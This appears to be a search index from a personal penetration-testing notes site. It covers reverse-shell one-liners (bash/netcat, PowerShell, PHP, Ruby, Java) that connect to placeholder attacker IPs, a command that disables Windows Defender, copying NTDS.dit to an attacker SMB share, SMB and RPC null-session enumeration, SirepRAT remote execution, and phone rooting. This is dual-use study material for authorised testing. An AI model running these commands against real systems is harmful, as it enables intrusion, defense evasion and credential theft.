    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f\n\n# rm /tmp/f;\n# Removes the /tmp/f file if it exists, -f causes rm to ignore nonexistent files. The semi-colon (;) is used to execute the command sequentially.\n\n# mkfifo /tmp/f;\n# Makes a FIFO named pipe file at the location specified. In this case, /tmp/f is the FIFO named pipe file, the semi-colon (;) is used to execute the command sequentially.\n\n# cat /tmp/f |\n# Concatenates the FIFO named pipe file /tmp/f, the pipe (|) connects the standard output of cat /tmp/f to the standard input of the command that comes after the pipe (|).\n\n# /bin/sh -i 2>&1 |\n# Specifies the command language interpreter using the -i option to ensure the shell is interactive. 2>&1 ensures the standard error data stream (2) & standard output data stream (1) are redirected to the command following the pipe (|).\n\n# nc $ip <port> >/tmp/f\n# Uses Netcat to send a connection to our attack host $ip listening on port <port>. The output will be redirected (>) to /tmp/f, serving the Bash shell to our waiting Netcat listener when the reverse shell one-liner command is executed\n
    ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#powershell","title":"powershell","text":"
powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"\n\n# same, but without assigning $client to the new object\npowershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"10.10.10.10\",1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\n\n# powershell -nop -c \n# Executes powershell.exe with no profile (nop) and executes the command/script block (-c or -Command) contained in the quotes\n\n# \"$client = New-Object System.Net.Sockets.TCPClient(10.10.14.158,443);\n# Sets/evaluates the variable $client equal to (=) the New-Object cmdlet, which creates an instance of the System.Net.Sockets.TCPClient .NET framework object. The .NET framework object will connect with the TCP socket listed in the parentheses (10.10.14.158,443). The semi-colon (;) ensures the commands & code are executed sequentially.\n\n# $stream = $client.GetStream();\n# Sets/evaluates the variable $stream equal to (=) the $client variable and the .NET framework method called GetStream that facilitates network communications. \n\n# [byte[]]$bytes = 0..65535|%{0}; \n# Creates a byte type array ([]) called $bytes that returns 65,535 zeros as the values in the array. This is essentially an empty byte stream that will be directed to the TCP listener on an attack box awaiting a connection.\n\n# while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)\n\n# Starts a while loop containing the $i variable set equal to (=) the .NET framework Stream.Read ($stream.Read) method. The parameters: buffer ($bytes), offset (0), and count ($bytes.Length) are defined inside the parentheses of the method.\n\n\n# {;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);\n# Sets/evaluates the variable $data equal to (=) an ASCII encoding .NET framework class that will be used in conjunction with the GetString method to encode the byte stream ($bytes) into ASCII. In short, what we type won't just be transmitted and received as empty bits but will be encoded as ASCII text. \n\n# $sendback = (iex $data 2>&1 | Out-String ); \n# Sets/evaluates the variable $sendback equal to (=) the Invoke-Expression (iex) cmdlet against the $data variable, then redirects the standard error stream (2>) into the standard output stream (&1) and pipes (|) the result to the Out-String cmdlet which converts input objects into strings. Because Invoke-Expression is used, everything stored in $data will be run on the local computer. \n\n# $sendback2 = $sendback + 'PS ' + (pwd).path + '> '; \n# Sets/evaluates the variable $sendback2 equal to (=) the $sendback variable plus (+) the string PS ('PS') plus + path to the working directory ((pwd).path) plus (+) the string '> '. 
This will result in the shell prompt being PS C:\\workingdirectoryofmachine >. \n\n# $sendbyte=  ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}\n# Sets/evaluates the variable $sendbyte equal to (=) the ASCII encoded byte stream that will use a TCP client to initiate a PowerShell session with a Netcat listener running on the attack box.\n
 # Disable Windows Defender real-time monitoring (requires an elevated shell)\nSet-MpPreference -DisableRealtimeMonitoring $true\n
    ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#php","title":"php","text":"
    php -r '$sock=fsockopen(\"10.0.0.1\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");'\n
    ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#netcat","title":"netcat","text":"
    nc -e /bin/sh 10.0.0.1 1234\n\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f\n
    ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#ruby","title":"ruby","text":"
    ruby -rsocket -e'f=TCPSocket.open(\"10.0.0.1\",1234).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'\n
    ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#java","title":"java","text":"
    r = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\np.waitFor()\n
    ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"reverse-shells/#xterm","title":"xterm","text":"
    xterm -display 10.0.0.1:1\n
    ","tags":["pentesting","web","pentesting","reverse-shells"]},{"location":"rooting-mobile/","title":"Rooting mobile","text":""},{"location":"rooting-mobile/#samsung-galaxy-a515f","title":"Samsung Galaxy A515F","text":""},{"location":"rooting-mobile/#install-a-windows-10-vm-in-your-phisical-kali-machine","title":"Install a Windows 10 VM in your phisical kali machine","text":"
1. Install a Windows 10 VM in your preferred hypervisor.

2. Pass your USB device through to the Windows machine: VirtualBox > Settings (on the desired VM) > USB > make sure USB 3.0 is selected > click on the + icon and select the device.

Troubleshooting: you may find that your Android phone does not appear there yet. The reason might be that the user running the VirtualBox process has no permission to access the USB-mounted devices. We will add it on our physical machine (Kali):

    sudo usermod -a -G vboxusers $username\nnewgrp vboxusers\n\n# and reboot kali\n

After that, repeat step 2 and we should see the device.

    "},{"location":"rooting-mobile/#install-samsung-drivers-in-your-windows-vm","title":"Install Samsung drivers in your Windows VM","text":"

This video walks through the process: https://www.youtube.com/watch?v=K3Jk7dCvdNM.

    This is the download link for getting those drivers: https://developer.samsung.com/android-usb-driver.

Also try to install Samsung DeX. I could not, but since the drivers were already installed, this step turned out to be optional.

    "},{"location":"rooting-mobile/#backup-your-mobile","title":"Backup your mobile","text":"

Because we are going to perform a factory reset.

    "},{"location":"rooting-mobile/#enable-developers-mode-in-your-device","title":"Enable developers mode in your device","text":"

Go to Settings > About the phone > Software Information > and tap "Build Number" repeatedly (typically seven times). Eventually you will see a message with a countdown that enables "Developer mode".

    "},{"location":"rooting-mobile/#enable-debug-mode","title":"Enable Debug mode","text":"

Go to Settings > Developer options (now enabled) > Debug mode and set it to ON.

    "},{"location":"rooting-mobile/#set-oem-unlocking-to-on","title":"Set OEM unlocking to ON","text":"

Go to Settings > Developer options (now enabled) > OEM unlocking and set it to ON.

    "},{"location":"rooting-mobile/#get-into-download-mode-and-unblock-the-bootloader","title":"Get into Download mode and unblock the Bootloader","text":"

Turn off your Android phone completely, making sure it is fully powered off.

Press and hold Volume Up and Volume Down at the same time. While holding them, connect the USB-C cable to your device (and to your computer) and you will see a warning screen. Once it appears, you can release the volume buttons.

Now long-press the Volume Up button and you will see this message (release when you see it):

The following two steps are:

Press Volume Up once and you will see a black screen. When the screen turns black, quickly press Volume Up and Volume Down at the same time once. With that, the bootloader will be unlocked.

Now we will enter Download mode by pressing the Volume Up button once.

Leave the device as it is and switch to your Windows VM.

    "},{"location":"rooting-mobile/#flash-the-device-from-the-windows-vm","title":"Flash the device from the windows VM","text":"

First of all, make sure you have the proper firmware file. To identify it, open your device properties and check the firmware version:

This, along with your phone model, will be useful for finding the firmware.

    Download it to your windows VM and unzip it.

    Open Odin.

    Make sure the device appears.

Go to the Options tab and disable "Auto Reboot". In AP, select the firmware file; the process may take a while:

    Click on Start and wait until you see the PASS message:

    Be careful not to disconnect the USB-C cable.

    "},{"location":"rooting-mobile/#enter-in-recovery-mode","title":"Enter in Recovery mode","text":"

    Go back to your Android Device and long press the 3 buttons (volume Up - Volume Down - and Power) at the same time.

When the screen turns black, release only the Volume Down button; keep holding the others until the Samsung logo appears. From that point, count to three, then release the Power button while keeping Volume Up pressed.

    ...

Troubleshooting: apparently I did not do it correctly and got stuck in a situation in which my phone was in Download mode displaying RMM/KG State: Prenormal, so it had no OEM unlocking option enabled and could not be rooted. The solution: https://www.youtube.com/watch?v=TBUY05mnCP8

After that, I did not know if I had to go back to the flash step or if I should try to get to Download mode and then into Recovery mode. I went through a loop of turning the phone on and off, with several reinstallations and frozen screens showing the Samsung logo. I saw the "erasing" message several times and...

Odin3 v3.14.4: https://dl2018.sammobile.com/Odin.zip

Samsung drivers: https://developer.samsung.com/android-usb-driver

TWRP: https://forum.xda-developers.com/t/recovery-unofficial-teamwin-recovery-project-v3-6-2-android-11-12.4400869/

Magisk: https://github.com/topjohnwu/Magisk

    MultiDisabler : https://forum.xda-developers.com/t/pie-10-11-system-as-root-multidisabler-disables-encryption-vaultkeeper-auto-flash-of-stock-recovery-proca-wsm-cass-etc.3919714/


    Rooting a device will allow us to:

• install custom ROMs based on One UI, pure Android, or GSI (Android generic system images)
• modify on-device apps that require root access

We will also lose some Samsung features: Samsung ..., Samsung Health, Samsung Gear, Samsung Safe Folder, and the guarantee.

But some of these features (Samsung Health, Samsung Gear, Samsung Safe Folder) may be recovered with a custom ROM.

    How to enable USB in virtualbox: https://www.techrepublic.com/article/how-to-enable-usb-in-virtualbox/

    "},{"location":"rpcclient/","title":"rpcclient - A tool for interacting with smb shares","text":"

    This is a tool to perform MS-RPC functions.

Remote Procedure Call (RPC) is a central mechanism for building operational, work-sharing structures in networks and client-server architectures.

    Remote Procedure Call (RPC) is a powerful technique for constructing distributed, client-server based applications. It is based on extending the conventional local procedure calling so that the called procedure need not exist in the same address space as the calling procedure. The two processes may be on the same system, or they may be on different systems with a network connecting them.

    ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"rpcclient/#basic-usage","title":"Basic usage","text":"
    # Connect to a remote shared folder (same as smbclient in this regard)\nrpcclient -U \"\" 10.129.14.128\n\n# Server information\nsrvinfo\n\n# Enumerate all domains that are deployed in the network \nenumdomains\n\n# Provides domain, server, and user information of deployed domains.\nquerydominfo\n\n# Enumerates all available shares.\nnetshareenumall\n\n# Provides information about a specific share.\nnetsharegetinfo <share>\n\n# Enumerates all domain users.\nenumdomusers\n\n# Provides information about a specific user.\nqueryuser <RID>\n    # An example:\n    # rpcclient $> queryuser 0x3e8\n\n# Provides information about a specific group.\nquerygroup <ID>\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"rpcclient/#brute-forcing-user-enumeration-with-rpcclient","title":"Brute forcing user enumeration with rpcclient","text":"
    for i in $(seq 500 1100);do rpcclient -N -U \"\" $ip -c \"queryuser 0x$(printf '%x\\n' $i)\" | grep \"User Name\\|user_rid\\|group_rid\" && echo \"\";done\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"rsat-remote-server-administration-tools/","title":"Remote Server Administration Tools (RSAT)","text":"

    The Remote Server Administration Tools (RSAT) have been part of Windows since the days of Windows 2000. RSAT allows systems administrators to remotely manage Windows Server roles and features from a workstation running Windows 10, Windows 8.1, Windows 7, or Windows Vista. RSAT can only be installed on Professional or Enterprise editions of Windows.

    • Script to install RSAT on Windows 10 1809, 1903, and 1909.
    • Other versions of Windows and more documentation.
# Check if RSAT tools are installed\nGet-WindowsCapability -Name RSAT* -Online | Select-Object -Property Name, State\n\n# Install all RSAT tools\nGet-WindowsCapability -Name RSAT* -Online | Add-WindowsCapability -Online\n\n# Install a specific RSAT tool, for instance Rsat.ActiveDirectory.DS-LDS.Tools\nAdd-WindowsCapability -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0 -Online\n

Once installed, all of the tools will be available under: Control Panel > All Control Panel Items > Administrative Tools.

    ","tags":["tools"]},{"location":"rules-of-engagement-checklist/","title":"Rules of Engagement - Checklist","text":"Checkpoint Contents \u2610 Introduction Description of this document. \u2610 Contractor Company name, contractor full name, job title. \u2610 Penetration Testers Company name, pentesters full name. \u2610 Contact Information Mailing addresses, e-mail addresses, and phone numbers of all client parties and penetration testers. \u2610 Purpose Description of the purpose for the conducted penetration test. \u2610 Goals Description of the goals that should be achieved with the penetration test. \u2610 Scope All IPs, domain names, URLs, or CIDR ranges. \u2610 Lines of Communication Online conferences or phone calls or face-to-face meetings, or via e-mail. \u2610 Time Estimation Start and end dates. \u2610 Time of the Day to Test Times of the day to test. \u2610 Penetration Testing Type External/Internal Penetration Test/Vulnerability Assessments/Social Engineering. \u2610 Penetration Testing Locations Description of how the connection to the client network is established. \u2610 Methodologies OSSTMM, PTES, OWASP, and others. \u2610 Objectives / Flags Users, specific files, specific information, and others. \u2610 Evidence Handling Encryption, secure protocols \u2610 System Backups Configuration files, databases, and others. \u2610 Information Handling Strong data encryption \u2610 Incident Handling and Reporting Cases for contact, pentest interruptions, type of reports \u2610 Status Meetings Frequency of meetings, dates, times, included parties \u2610 Reporting Type, target readers, focus \u2610 Retesting Start and end dates \u2610 Disclaimers and Limitation of Liability System damage, data loss \u2610 Permission to Test Signed contract, contractors agreement","tags":["information-gathering","rules of engagement","cpts"]},{"location":"samba-suite/","title":"Samba Suite","text":"

It is used to enumerate information from SMB services and can be used in a Null Session attack.

    ","tags":["pentesting"]},{"location":"samba-suite/#installation","title":"Installation","text":"

    Download it from: https://www.samba.org/

    ","tags":["pentesting"]},{"location":"samba-suite/#basic-commands","title":"Basic commands","text":"
    1. Enumerate File Server services:
    nmblookup -A $ip\n
2. With smbclient we can also enumerate the shares provided by a host:
smbclient -L //$ip -N\n\n# -L  Look at what services are available on a target\n# //$ip  Prepend the two slashes to the target IP\n# -N  Force the tool not to ask for a password\n
3. Connect:
    smbclient \\\\$ip\\sharedfolder -N\n

    Be careful, sometimes the shell removes the slashes and you need to escape them.

4. Once connected, you can browse with the smb command line. To see the allowed commands: help
5. When you know the path of a file and you want to retrieve it:
      • from kali:
        smbget smb://$ip/SharedFolder/flag_1.txt\n
      • from smb command line:
        get flag_1.txt\n
    ","tags":["pentesting"]},{"location":"samrdump/","title":"SAMRDump","text":"

    Impacket\u2019s samrdump.py communicates with the Security Account Manager Remote (SAMR) interface to list system user accounts, available resource shares, and other sensitive information.

    ","tags":["pentesting windows"]},{"location":"samrdump/#basic-commands","title":"Basic commands","text":"
    # path: /usr/share/doc/python3-impacket/examples/samrdump.py\npython3 samrdump.py $ip\n
    ","tags":["pentesting windows"]},{"location":"scrcpy/","title":"scrcpy","text":"","tags":["mobile pentesting","android"]},{"location":"scrcpy/#installation","title":"Installation","text":"

    Download from: https://github.com/Genymobile/scrcpy.

    ","tags":["mobile pentesting","android"]},{"location":"scrcpy/#on-linux","title":"On Linux","text":"

    Source: https://github.com/Genymobile/scrcpy/blob/master/doc/linux.md

    First, you need to install the required packages:

    # for Debian/Ubuntu\nsudo apt install ffmpeg libsdl2-2.0-0 adb wget \\\n                 gcc git pkg-config meson ninja-build libsdl2-dev \\\n                 libavcodec-dev libavdevice-dev libavformat-dev libavutil-dev \\\n                 libswresample-dev libusb-1.0-0 libusb-1.0-0-dev\n

    Then clone the repo and execute the installation script (source):

    git clone https://github.com/Genymobile/scrcpy\ncd scrcpy\n./install_release.sh\n

    When a new release is out, update the repo and reinstall:

    git pull\n./install_release.sh\n

    To uninstall:

    sudo ninja -Cbuild-auto uninstall\n

    Note that this simplified process only works for released versions (it downloads a prebuilt server binary), so for example you can't use it for testing the development branch (dev).

    ","tags":["mobile pentesting","android"]},{"location":"scrcpy/#basic-usage","title":"Basic usage","text":"
    scrcpy\n
    ","tags":["mobile pentesting","android"]},{"location":"scrcpy/#debugging","title":"Debugging","text":"

For scrcpy to work, there must be an adb connection, which requires the following (a quick check is sketched after the list):

    • Having developer mode enabled.
    • Having USB debug mode enabled.
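A quick sanity check for both requirements, assuming adb is installed on the host:

adb devices
# The phone must appear with the state "device"; "unauthorized" means the
# debugging prompt on the phone has not been accepted yet.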

There is an extra security restriction on Xiaomi MIUI devices, which by default prevents granting permissions via USB debugging:

"USB debugging (Security settings)": Allow granting permissions and simulating input via USB debugging.

This may require signing in to a Xiaomi account (or signing up if you have none).

Otherwise, you will get permission error messages.

    ","tags":["mobile pentesting","android"]},{"location":"searchsploit/","title":"searchsploit","text":"

    The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers.

    ","tags":["pentesting","web pentesting","exploitation"]},{"location":"searchsploit/#installation","title":"Installation","text":"

Pre-installed in Kali. Otherwise, download it from https://gitlab.com/exploit-database/exploitdb or install it with:

    sudo apt install exploitdb -y\n
    ","tags":["pentesting","web pentesting","exploitation"]},{"location":"searchsploit/#basic-usage","title":"Basic usage","text":"
    searchsploit <WhatYouAreLookingFor>\n

Example: if you want to have a look at the listed PoCs, append the path provided to the root location of the searchsploit database (/usr/share/exploitdb/exploits).
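A sketch of that workflow; the search term and exploit path below are illustrative, not taken from a specific run:

# Search the local database
searchsploit nibbleblog

# Mirror (copy) an exploit to the current directory
searchsploit -m php/remote/38489.rb

# Examine an exploit without copying it
searchsploit -x php/remote/38489.rb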

    ","tags":["pentesting","web pentesting","exploitation"]},{"location":"seatbelt/","title":"Seatbelt","text":"

Seatbelt is a C# project that performs a number of security-oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.

    ","tags":["pentesting","windows pentesting","enumeration"]},{"location":"seatbelt/#installation","title":"Installation","text":"

    Github repo: https://github.com/GhostPack/Seatbelt.
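A minimal usage sketch, assuming you have compiled the solution or obtained a Seatbelt.exe binary (the command groups below follow the project's documented flags; the output path is illustrative):

# Run all checks
Seatbelt.exe -group=all

# Run system-focused checks and save the output
Seatbelt.exe -group=system -outputfile="C:\Temp\seatbelt.txt"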

    ","tags":["pentesting","windows pentesting","enumeration"]},{"location":"servers/","title":"Setting up a server (in the attacking machine)","text":"Protocol / app smb server Apache server ngix symple python server php web server Ruby web server Burp Suite Collaborator Interactsh responder","tags":["servers","file transfer"]},{"location":"servers/#smb-server","title":"smb server","text":"

    Launch smbserver in our attacker machine:

    sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/username/Documents/\n

Now, from PowerShell on the victim's Windows machine, we can move a file to the shared folder on the attacker machine just by running:

    cmd.exe /c move C:\\NTDS\\NTDS.dit \\\\$ip\\CompData\n
    ","tags":["servers","file transfer"]},{"location":"servers/#apache-server","title":"Apache server","text":"

    Once you have a folder structure such as \"/var/www/\" or \"/var/www/html\", and also an Apache server installed, you can serve all files from that path by initiating the service:

    # Start Apache\nservice apache2 start\n\n# Stop Apache\nservice apache2 stop\n\n# Restart Apache\nservice apache2 restart\n\n# See status of Apache server\nservice apache2 status\n

    In Apache, the PHP module loves to execute anything ending in PHP. Also, by default, with Apache, if we hit a directory without an index file (index.html), it will list all the files.
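With the service running, any payload dropped into /var/www/html can be fetched from the victim; for example (the attacker IP and filename are illustrative):

# On the victim
wget http://10.10.14.2/linpeas.sh
# or
curl http://10.10.14.2/linpeas.sh -o linpeas.sh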

    ","tags":["servers","file transfer"]},{"location":"servers/#nginx","title":"Nginx","text":"

In Apache, the PHP module loves to execute anything ending in PHP. This is not very safe when allowing HTTP uploads, as we want to prevent users from uploading web shells and executing them.

    # Create a Directory to Handle Uploaded Files\nsudo mkdir -p /var/www/uploads/SecretUploadDirectory\n\n# Change the Owner to www-data\nsudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory\n\n# Create Nginx Configuration File by creating the file /etc/nginx/sites-available/upload.conf with the contents:\nserver {\n    listen 9001;\n\n    location /SecretUploadDirectory/ {\n        root    /var/www/uploads;\n        dav_methods PUT;\n    }\n}\n\n# Symlink our Site to the sites-enabled Directory\nsudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/\n\n# Start Nginx\nsudo systemctl restart nginx.service\n\n# If we get any error messages, check /var/log/nginx/error.log. we might see, for instance, port 80 is already in use.\n

Debugging nginx:

    First check: ensure the directory listing is not enabled by navigating to http://localhost/SecretUploadDirectory

Second check: is the nginx default port already in use?

# Verifying errors\ntail -2 /var/log/nginx/error.log\n# we might see that port 80 could not be bound because it is already in use\n\n# See which service is using port 80\nss -lnpt | grep 80\n# we will obtain the service and also the pid, for instance 2811\n\n# Check the pid, for instance 2811, and see who is running it\nps -ef | grep "2811"\n\n# Remove the default Nginx configuration to get around this, since it binds on port 80\nsudo rm /etc/nginx/sites-enabled/default\n

Finally, you can upload to your nginx server any file you want to transfer with curl:

curl -T file.txt http://$ip:9001/SecretUploadDirectory/\n# -T, --upload-file <file>: transfers the specified local file to the remote URL using the HTTP PUT method\n
    ","tags":["servers","file transfer"]},{"location":"servers/#simple-python-server","title":"Simple python server","text":"
    # Creating a Web Server with Python3\ncd /tmp\npython3 -m http.server 8000\n\n# Creating a Web Server with Python2.7\npython2.7 -m SimpleHTTPServer\n
    ","tags":["servers","file transfer"]},{"location":"servers/#php-web-server","title":"PHP web server","text":"
    php -S 0.0.0.0:8000\n
    ","tags":["servers","file transfer"]},{"location":"servers/#ruby-web-server","title":"Ruby Web Server","text":"
    ruby -run -ehttpd . -p8000\n
    ","tags":["servers","file transfer"]},{"location":"setting-up-mobile-penstesting/","title":"Setting up the mobile pentesting environment","text":"

    Instructions

    1. Start by installing drozer.
    2. Install frida and, also, Burp certificate in frida.
    3. Install apktool.
    4. Install Objection.

    Nice-to-have tools

    1. Mobile Security Framework: MobSF.
    2. mobsfscan.

    ADB (Android Debug Bridge) cheat sheet.

    ","tags":["mobile pentesting"]},{"location":"setting-up-mobile-penstesting/#resources","title":"Resources","text":"

    https://medium.com/@lightbulbr/how-to-root-an-android-emulator-with-tiramisu-android-13-f070a756c499

    Install Java JDK: https://wiki.centos.org/HowTos(2f)JavaDevelopmentKit.html

    ","tags":["mobile pentesting"]},{"location":"sharpview/","title":"SharpView","text":"

SharpView (C#) does not support filtering using the PowerShell pipeline.

    ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"sharpview/#installation","title":"Installation","text":"

SharpView is a .NET port of PowerView.

    Download github repo from: https://github.com/tevora-threat/SharpView/.

    ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"shodan/","title":"shodan","text":"

    Shodan can be used to find devices and systems permanently connected to the Internet like Internet of Things (IoT). It searches the Internet for open TCP/IP ports and filters the systems according to specific terms and criteria. For example, open HTTP or HTTPS ports and other server ports for FTP, SSH, SNMP, Telnet, RTSP, or SIP are searched. As a result, we can find devices and systems, such as surveillance cameras, servers, smart home systems, industrial controllers, traffic lights and traffic controllers, and various network components.

    "},{"location":"shodan/#search-parameters","title":"Search parameters","text":"
    country:\ncity:\ngeo:\nhostname:\nnet:\nos:\nport:\nbefore: / after:\n
    "},{"location":"shodan/#example-shodan-for-enumeration","title":"Example: shodan for enumeration","text":"

    Content from Pentesting notes:

    crt.sh: it enables the verification of issued digital certificates for encrypted Internet connections. This is intended to enable the detection of false or maliciously issued certificates for a domain.

    # Get all subdomais with that digital certificate\ncurl -s https://crt.sh/\\?q\\=example.com\\&output\\=json | jq .\n\n# Filter all by unique subdomain\ncurl -s https://crt.sh/\\?q\\=example.com\\&output\\=json | jq . | grep name | cut -d\":\" -f2 | grep -v \"CN=\" | cut -d'\"' -f2 | awk '{gsub(/\\\\n/,\"\\n\");}1;' | sort -u\n\n# With the list of unique subdomains, list all the Company hosted servers\nfor i in $(cat subdomainlist);do host $i | grep \"has address\" | grep example.com | cut -d\" \" -f4 >> ip-addresses.txt;done\n

    Shodan: Once we see which hosts can be investigated further, we can generate a list of IP addresses with a minor adjustment to the cut command and run them through Shodan.

    for i in $(cat ip-addresses.txt);do shodan host $i;done\n

    Go to Pentesting notes to pursuit DNS enumeration.

    "},{"location":"sireprat/","title":"SirepRAT - RCE as SYSTEM on Windows IoT Core","text":"

SirepRAT provides full RAT capabilities without the need to write real RAT malware on the target.

https://github.com/SafeBreach-Labs/SirepRAT#context

    ","tags":["windows","rce"]},{"location":"sireprat/#installation","title":"Installation","text":"
    # Download the repository\ngit clone https://github.com/SafeBreach-Labs/SirepRAT.git\n\n# Run the installation\npip install -r requirements.txt\n
    ","tags":["windows","rce"]},{"location":"sireprat/#basic-usage","title":"Basic usage","text":"","tags":["windows","rce"]},{"location":"sireprat/#usage","title":"Usage","text":"
    # Download File bash\npython SirepRAT.py $ip GetFileFromDevice --remote_path \"C:\\Windows\\System32\\drivers\\etc\\hosts\" --v\n\n# Upload File\npython SirepRAT.py $ip PutFileOnDevice --remote_path \"C:\\Windows\\System32\\uploaded.txt\" --data \"Hello IoT world!\"\n\n# Run Arbitrary Program\npython SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd \"C:\\Windows\\System32\\hostname.exe\"\n\n# With arguments, impersonated as the currently logged on user:\npython SirepRAT.py $ip LaunchCommandWithOutput --return_output --as_logged_on_user --cmd \"C:\\Windows\\System32\\cmd.exe\" --args \" /c echo {{userprofile}}\"\n\n# Try to run it without the\u00a0as_logged_on_user\u00a0flag to demonstrate the SYSTEM execution capability)\n# Get System Information\npython SirepRAT.py $ip GetSystemInformationFromDevice\n
    ","tags":["windows","rce"]},{"location":"sireprat/#get-file-information","title":"Get File Information","text":"
    python SirepRAT.py 192.168.3.17 GetFileInformationFromDevice --remote_path \"C:\\Windows\\System32\\ntoskrnl.exe\"\n
    ","tags":["windows","rce"]},{"location":"sireprat/#see-help-for-full-details","title":"See help for full details:","text":"
    python SirepRAT.py --help\n
    ","tags":["windows","rce"]},{"location":"sireprat/#author","title":"Author","text":"","tags":["windows","rce"]},{"location":"sireprat/#related-labs","title":"Related Labs","text":"","tags":["windows","rce"]},{"location":"smbclient/","title":"smbclient - A tool for interacting with smb shares","text":"

    See Quick Cheat sheet for smbclient.

    ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbclient/#smbclient-installation","title":"smbclient installation","text":"
    sudo apt-get install smbclient\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbclient/#smbclient-configuration","title":"smbclient configuration","text":"

    Default settings are in /etc/samba/smb.conf.

     cat /etc/samba/smb.conf | grep -v \"#\\|\\;\" \n
Settings and their descriptions:
• [sharename]: The name of the network share.
• workgroup = WORKGROUP/DOMAIN: Workgroup that will appear when clients query.
• path = /path/here/: The directory to which the user is to be given access.
• server string = STRING: The string that will show up when a connection is initiated.
• unix password sync = yes: Synchronize the UNIX password with the SMB password?
• usershare allow guests = yes: Allow non-authenticated users to access defined shares?
• map to guest = bad user: What to do when a user login request doesn't match a valid UNIX user?
• browseable = yes: Should this share be shown in the list of available shares?
• guest ok = yes: Allow connecting to the service without using a password?
• read only = yes: Allow users to read files only?
• create mask = 0700: What permissions need to be set for newly created files?

    For pentesting notes on ports 137, 138, 139 and 445 with a smb service, see 137-138-139-445-smb.

    ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbclient/#smbclient-connection","title":"smbclient connection","text":"


    # [-L|--list=HOST] : Selecting the targeted host for the connection request.\nsmbclient -L -N //$ip\n# -N: Suppresses the password prompt.\n# -L: retrieve a list of available shares on the remote host\n

Smbclient will attempt to connect to the remote host and check if any authentication is required. If there is, it will ask for a password for your local username: if we do not specify a username when attempting to connect, smbclient just uses the local machine's username. If the target is vulnerable and we are performing a Null Session attack, we simply hit Enter when prompted for a password.

    After authenticating, we may obtain access to some typical shared folders, such as:

    ADMIN$ - Administrative shares are hidden network shares created by the Windows NT family of operating systems that allow system administrators to have remote access to every disk volume on a network-connected system. These shares may not be permanently deleted but may be disabled.\n\nC$ - Administrative share for the C:\\ disk volume. This is where the operating system is hosted.\n\nIPC$ - The inter-process communication share. Used for inter-process communication via named pipes and is not part of the file system.\nWorkShares - Custom share. \n

    We will try to connect to each of the shares except for the IPC$ one, which is not valuable for us since it is not browsable as any regular directory would be and does not contain any files that we could use at this stage of our learning experience:

    # the use of / and \\ might be different if you need to escape some characters\nsmbclient \\\\\\\\$ip\\\\ADMIN$\n

Important: sometimes some juggling is needed:

    smbclient -N -L \\\\$ip\nsmbclient -N -L \\\\\\\\$ip\nsmbclient -N -L /\\/\\$ip\n

    If we have NT_STATUS_ACCESS_DENIED as output, we do not have the proper credentials to connect to this share.

Connect to a shared folder as Administrator:

    smbclient -L 10.129.228.98 -U Administrator\n

We can also use the rpcclient tool to connect to the shared folders.

    ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbclient/#basic-commands-in-smbclient","title":"Basic commands in SMBclient","text":"
    # Show available commands\nhelp\n\n# Download a file\nget <file>\n\n# See status\nsmbstatus\n\n# Smbclient also allows us to execute local system commands using an exclamation mark at the beginning (`!<cmd>`) without interrupting the connection.\n!cmd\n\n!cat prep-prod.txt\n
